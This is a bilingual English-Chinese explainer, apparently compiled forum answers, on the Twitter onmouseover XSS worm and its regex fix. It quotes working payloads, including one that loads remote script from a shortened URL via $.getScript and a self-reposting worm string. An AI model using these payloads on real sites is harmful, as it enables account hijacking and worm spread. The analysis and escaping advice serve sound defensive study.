The vulnerability is because URLs were not being parsed properly. For example, the following URL is posted to Twitter:

该漏洞是因为 URL 没有被正确解析。例如，将以下 URL 发布到 Twitter：

http://thisisatest.com/@"onmouseover="alert('test xss')"/

Twitter treats this as the URL. When it is parsed Twitter wraps a link around that code, so the HTML now looks like:

Twitter 将此视为 URL。当它被解析时，Twitter 会在该代码周围包裹一个链接，因此 HTML 现在看起来像：

<a href="http://thisisatest.com/@"onmouseover="alert('test xss')"rel/" target="_blank" ="">http://thisisatest.com/@"onmouseover="alert('test xss')"/</a></span> 

You can see that by putting in the URL and the trailing slash, Twitter thinks it has a valid URL even though it contains a quote mark in it which allows it to escape (ie. terminate the hrefattribute, for the pedants out there) the URL attribute and include a mouse over. You can write anything to the page, including closing the link and including a script element. Also, you are not limited by the 140 character limit because you can use $.getScript().

你可以看到，通过输入 URL 和尾部斜杠，Twitter 认为它有一个有效的 URL，即使它包含一个引号，允许它转义（即终止href属性，对于那里的学究）URL属性并包括鼠标悬停。您可以向页面写入任何内容，包括关闭链接和包含脚本元素。此外，您不受 140 个字符的限制，因为您可以使用$.getScript().

Thiscommit, if it were pulled, would have prevented this XSS vulnerability.

如果此提交被取消，则可以防止此 XSS 漏洞。

In detail, the offending regex was:

详细地说，有问题的正则表达式是：

REGEXEN[:valid_url_path_chars] = /(?:
  #{REGEXEN[:wikipedia_disambiguation]}|
  @[^\/]+\/|
  [\.\,]?#{REGEXEN[:valid_general_url_path_chars]}
)/ix

The @[^\/]+\/part allowed any character (except a forward slash) when it was prefixed by an @ sign and suffixed by a forward slash.

@[^\/]+\/当它以@ 符号为前缀并以正斜杠作为后缀时，该部分允许使用任何字符（正斜杠除外）。

By changing to @#{REGEXEN[:valid_general_url_path_chars]}+\/it now only allows valid URL characters.

通过更改@#{REGEXEN[:valid_general_url_path_chars]}+\/它现在只允许有效的 URL 字符。

Yes this is XSS, it is attacking a javascript event handler. What is cool about this XSS is that it doesn't require <>to exploit. The injected string is: size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')".

是的，这是 XSS，它正在攻击javascript 事件处理程序。这个 XSS 很酷的地方在于它不需要<>利用。注入的字符串是：size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"。

The size::999999999999pxmakes it very large and there for more likly that someone will mouse over it. The real problem is the onmouseover=event handler.

这size::999999999999px使它变得非常大，并且更有可能有人将鼠标悬停在它上面。真正的问题是onmouseover=事件处理程序。

To prevent this in PHP you need to convert quote marks into their html entities: $var=htmlspecialchars($var,ENT_QUOTES);

为了防止在 PHP 中出现这种情况，您需要将引号转换为它们的 html 实体： $var=htmlspecialchars($var,ENT_QUOTES);

This is because HTML you cannot escape quotes like sql: \'

这是因为 HTML 不能像 sql 一样转义引号： \'

The exploit was a classic piece of Javascript injection. Suppose you write a tweet with the following text:

该漏洞利用是一个经典的 Javascript 注入。假设您用以下文本写了一条推文：

"http://www.guardian.co.uk/technology is the best!"

When you view the Twitter web page, that becomes a link, like so:

当您查看 Twitter 网页时，它会变成一个链接，如下所示：

<a href="http://www.guardian.co.uk/technology" class="tweet-url web" 
 rel="nofollow">http://www.guardian.co.uk/technology</a> is the best!

The exploit attacked that link-making function. The raw text of the exploit tweet would read something like this:

该漏洞攻击了该链接制作功能。漏洞利用推文的原始文本如下所示：

http://a.no/@";onmouseover=";$('textarea:first').val(this.innerHTML);
   $('.status-update-form').submit();"class="modal-overlay"/

Which Twitter didn't protect properly, probably because the @" character combination broke their [HTML] parser. That link would generate the following page source:

哪个 Twitter 没有正确保护，可能是因为 @" 字符组合破坏了他们的 [HTML] 解析器。该链接将生成以下页面源：

<a href="http://a.no/@";onmouseover=";$('textarea:first').val(this.innerHTML);
 $('.status-update-form').submit();"class="modal-overlay"/ class="tweet-url web"
      rel="nofollow">

This means that executable content (the onMouseOver="stuff" bit) has ended up in the page source code. Not knowing any better, the browser runs this code. Because it's running in the user's browser, it can do anything the user does; most variations used this power to re-post the content, which is why it spread like a virus. To encourage the user to activate the code by mousing over, they also formatted the block as black-on-black using CSS [Cascading Style Sheets, which determines the page layout]. Other versions were hacked around by users to have all sorts of other effects, such as porn site redirects, rainbow text in their tweets, and so forth. Some of them popped up dialog boxes designed to alarm the users, talking about accounts being disabled or passwords stolen (they weren't, in either case).

这意味着可执行内容（onMouseOver="stuff" 位）已在页面源代码中结束。不知道更好，浏览器运行此代码。因为它运行在用户的浏览器中，所以它可以做用户所做的任何事情；大多数变体都使用这种能力来重新发布内容，这就是它像病毒一样传播的原因。为了鼓励用户通过鼠标悬停来激活代码，他们还使用 CSS [级联样式表，决定页面布局] 将块格式化为黑底黑字。其他版本被用户入侵以产生各种其他效果，例如网站重定向、推文中的彩虹文字等。其中一些弹出对话框旨在警告用户，谈论帐户被禁用或密码被盗（在任何一种情况下都没有）。

Twitter fixed this not by blocking the string onMouseOver (which some dim-witted blogs were calling for) but by properly sanitising the input. The " marks in these tweets are now turned into " – the HTML-escaped form.

Twitter 不是通过阻止字符串 onMouseOver（一些愚蠢的博客所要求的）来解决这个问题，而是通过适当地清理输入。这些推文中的 " 标记现在变成了 " - HTML 转义形式。

Technically this is a second-order injection attack; the attack string is inserted into the database and handled correctly, but then the attack takes place as the string is read back out instead. It's not that complex an attack at all either - rather embarrassing for Twitter that they were caught out by this.

从技术上讲，这是一种二阶注入攻击；攻击字符串被插入到数据库中并被正确处理，但是当字符串被读回时，攻击就会发生。攻击也根本没有那么复杂——对于 Twitter 来说，他们被这件事抓住了，这让他们感到尴尬。

Source: The Twitter hack: how it started and how it worked

资料来源：Twitter 黑客：它是如何开始的以及它是如何工作的

It's an XSS exploit. As Twitter admitted in their update.You can prevent attacks like that by never allowing users to post javascript code. You should always filter it out. More information about avoiding XSS can be found here: http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

这是一个 XSS 漏洞利用。正如 Twitter 在他们的更新中承认的那样。您可以通过不允许用户发布 javascript 代码来防止此类攻击。您应该始终将其过滤掉。更多关于避免 XSS 的信息可以在这里找到：http://www.owasp.org/index.php/Cross-site_Scripting_(XSS )

From Wikipedia: "Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users."

来自维基百科：“跨站点脚本 (XSS) 是一种通常在 Web 应用程序中发现的计算机安全漏洞，它使恶意攻击者能够将客户端脚本注入其他用户查看的网页中。”

Today's attack fits the bill to me.

今天的攻击符合我的要求。

Basically there was some sort of parsing error with Twitter.com display code. When they converted URLs to HTML hyperlinks, they weren't handling @ characters correctly and this was causing javascript events to be inserted into the HTML link.

基本上 Twitter.com 显示代码存在某种解析错误。当他们将 URL 转换为 HTML 超链接时，他们没有正确处理 @ 字符，这导致 javascript 事件被插入到 HTML 链接中。